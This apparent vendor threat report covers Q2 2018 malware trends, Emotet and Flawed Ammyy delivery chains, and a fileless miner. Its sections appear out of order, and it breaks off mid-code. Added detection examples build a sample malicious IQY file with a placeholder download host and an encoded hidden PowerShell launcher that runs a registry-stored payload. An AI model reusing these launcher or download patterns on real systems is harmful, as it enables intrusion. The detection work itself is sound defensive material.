RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
de.postbank.finanzassistent
pl.mbank
aib.ibank.android
The second version can block access to some websites and services, including Google Chrome, the Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, acts mostly on Iranian territory. It uses third-party app stores, social networks and messengers to spread.
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it's sold in three options: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip" option. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises shown in the figure.
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see below, but one of the vectors is especially interesting.
Version-1: Netflix Hack, Instagram Hack
Version-2: TSF Launcher
Version-3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via ... another cryptominer, named CoinMiner.
How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April
4.2.2 May 2018
Android-targeted malware in May
4.2.3 June 2018
Android-targeted malware in June
5 Malware in Q2 2018 The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial of service. For this Q2 2018 report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm, by far, was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which in 2012 led to the arrest by the FBI of 10 people for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (.exe) and HTML files (.html) and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, owing to malicious functionality hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018 the majority of exploits detected by Comodo focused on a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2 Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2 Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open-source software that is compatible with numerous file formats and different operating systems and leverages an open-source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018 Russia was the #1 home of malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan that has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.
In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
The attached file is an Office document containing a VBScript. As the settings of a newly installed Microsoft Office do not allow execution of such scripts by default, the attackers added a special option to convince the victims to turn on VBScript execution.
The special option to convince the victims to turn on VBScript execution
The purpose of the VBScript is to launch PowerShell.
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlc, hxxpwwwthecyberconxioncomPUqUUe, hxxpEliasWesselcomvu6xGmS, hxxpmossbeachmusicdeXuBBN6r and hxxpairmaxxrswIdY.
At the time of writing, only the thecyberconxioncom host was serving a malware binary (SHA1: 5974190561e707f63d776e55336841bd871eebdb).
The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service "lanesviewer" to ensure persistence.
The malware creates ldquolanesviewerrdquo service to ensure persistence
And after that Emotet begins its real mission: stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.
The next example is even more cunning because it infects computers with popular, legitimate Microsoft software.
2.3 Flawed Ammyy RAT attack based on legitimate software
The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on legitimate software called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into the tools of a thief.
Ammyy Admin is Remote Desktop Software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.
The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.
As you can see in the diagram, Ammyy Admin was used in spreading many types of nefarious malware.
The newest version of the malicious modification of Ammyy Admin is called Flawed Ammyy. It's a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. The Flawed Ammyy RAT lets the attackers use functions such as Remote Desktop control, File System Manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, etc.
The way Flawed Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users. What is especially worth noticing is the fact that these tricks are also based on using legitimate software, from Microsoft this time.
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.
The phishing email
IQY files are intended for making an Internet query from MS Excel, so an IQY contains a URL and other related parameters. It can download files and run them directly in MS Excel.
The infected IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.
Malware runs PowerShell
Thus, in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.
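An added Python example (not code from the report) of how a mail gateway or endpoint script can parse an IQY attachment of the kind described above and decide whether to block it before Excel ever sees it. It relies on the documented shape of the format (the word WEB, a version line, the query URL, then key=value options) and rejects plaintext HTTP, raw IP targets and any host outside an allow-list. The two sample files, the placeholder hosts and the ALLOWED_HOSTS set are constructed for this example.

```python
import ipaddress
from urllib.parse import urlparse

# Constructed sample in the shape of the IQY attachment described above. The host
# uses the reserved .invalid TLD and is not an indicator taken from the report.
SAMPLE_MALICIOUS_IQY = (
    "WEB\r\n"
    "1\r\n"
    "http://update-service.invalid/1.dat\r\n"
    "\r\n"
    "Selection=AllTables\r\n"
    "Formatting=None\r\n"
)

# A benign query against an internal data source, also constructed for this example.
SAMPLE_BENIGN_IQY = "WEB\n1\nhttps://intranet.example.com/sales/report.csv\n"

# Assumption: the defender maintains an allow-list of hosts that Excel web
# queries may reach; anything else is blocked at the gateway.
ALLOWED_HOSTS = {"intranet.example.com"}


def parse_iqy(text: str) -> dict:
    """Parse a web query file: line 1 'WEB', line 2 version, line 3 URL, then key=value options."""
    lines = [line.strip() for line in text.splitlines()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not an Excel WEB query file")
    options = {}
    for line in lines[3:]:
        if "=" in line:
            key, value = line.split("=", 1)
            options[key.strip()] = value.strip()
    return {"version": lines[1], "url": lines[2], "options": options}


def assess_iqy(text: str) -> dict:
    """Return the query URL, the reasons it is suspicious, and a block verdict."""
    query = parse_iqy(text)
    url = urlparse(query["url"])
    reasons = []
    if url.scheme.lower() != "https":
        reasons.append("query is not over HTTPS")
    host = (url.hostname or "").lower()
    try:
        ipaddress.ip_address(host)
        reasons.append("query targets a raw IP address")
    except ValueError:
        pass  # a hostname, not an IP literal
    if host not in ALLOWED_HOSTS:
        reasons.append(f"host {host!r} is not on the allow-list")
    return {"url": query["url"], "reasons": reasons, "block": bool(reasons)}


if __name__ == "__main__":
    for sample in (SAMPLE_MALICIOUS_IQY, SAMPLE_BENIGN_IQY):
        print(assess_iqy(sample))
```

The allow-list is the check that matters most: the report's point is that the URL alone looks like an ordinary web query, so the verdict has to come from where the query is allowed to go, not from how the file looks.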
2.4 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
2.5 Ammyy Admin dissemination around the world for Q2
As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors toward covert theft and manipulating users. This trend is a real gift for cybercriminals and a terrible nightmare for users.
Trojans let attackers gain time. As the malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases attacks can only be discovered too late, after money is withdrawn from a bank account or confidential data is published, etc. The merging of trojans as payloads and phishing emails as the means of delivery observed during Q2 will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antiviruses.
To fight these attacks, cybersecurity departments need to rearrange their approach to security measures per the new trends above. Combining the best malware detection tools and methods of protecting data built on defense-in-depth principles provides the most promising solution.
[Chart: monthly values Apr 43188, May 46382, Jun 48881; vertical axis 40000 to 50000]
3 Cryptominer Evolution
Going Fileless, Killing Competitors, Crashing Systems
Cryptominers do not lead the Q2 malware pack, but that does not mean their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and re-provisioning to fight more efficiently. Cryptominers are quickly developing and gaining new, dangerous abilities.
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous; at least, cryptominers would not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.
But Q2 events clearly showed that the situation has radically changed.
New samples of cryptominers detected by Comodo malware analysts exhibit much more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash user systems if met with an attempt to delete the malware.
3.1 BadShell attacks enterprises
Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware represents malicious code injected into legitimate OS processes. It need not be installed on a victim machine but functions only in memory, making it much harder for antiviruses to detect.
Usually such malware is spread via malicious ad banners. Clicking on a banner redirects a user to an infected website, where the malware covertly installs itself onto the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence, and the Registry to hold the malicious binary code. In the screenshots below you see how exactly the malware, dubbed BadShell, works.
If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.
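To make the decoding step concrete, here is an added Python example (not the report's code, and not the actual BadShell or Emotet launcher) that does what an analyst does by hand on a process-creation event: pull the base64 argument out of a powershell.exe command line, decode it as UTF-16LE, and flag the combination of a hidden window, a registry read, base64 decoding and in-memory execution that this kind of loader produces. The command line, the registry path HKCU:\Software\ExampleVendor and the Payload value name are constructed for the example.

```python
import base64
import re

# Constructed sample: the inner script a VBScript or Task Scheduler launcher
# might hand to PowerShell. The registry path and value name are placeholders
# made up for this example, not those used by BadShell or Emotet.
SAMPLE_INNER = (
    "$p = (Get-ItemProperty -Path 'HKCU:\\Software\\ExampleVendor').Payload;"
    "IEX ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($p)))"
)


def encode_powershell(script: str) -> str:
    """Produce the -EncodedCommand form: the script as UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# The outer command line as it would appear in process-creation telemetry.
SAMPLE_CMDLINE = (
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand "
    + encode_powershell(SAMPLE_INNER)
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# the lookahead stops -Exec / -ExecutionPolicy from being mistaken for it.
ENC_FLAG = re.compile(r"-e(?!x)[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)

# Behaviours worth flagging in either the outer command line or the decoded script.
INDICATORS = {
    "hidden_window": re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I),
    "registry_read": re.compile(r"Get-ItemProperty|\bHKCU:|\bHKLM:", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
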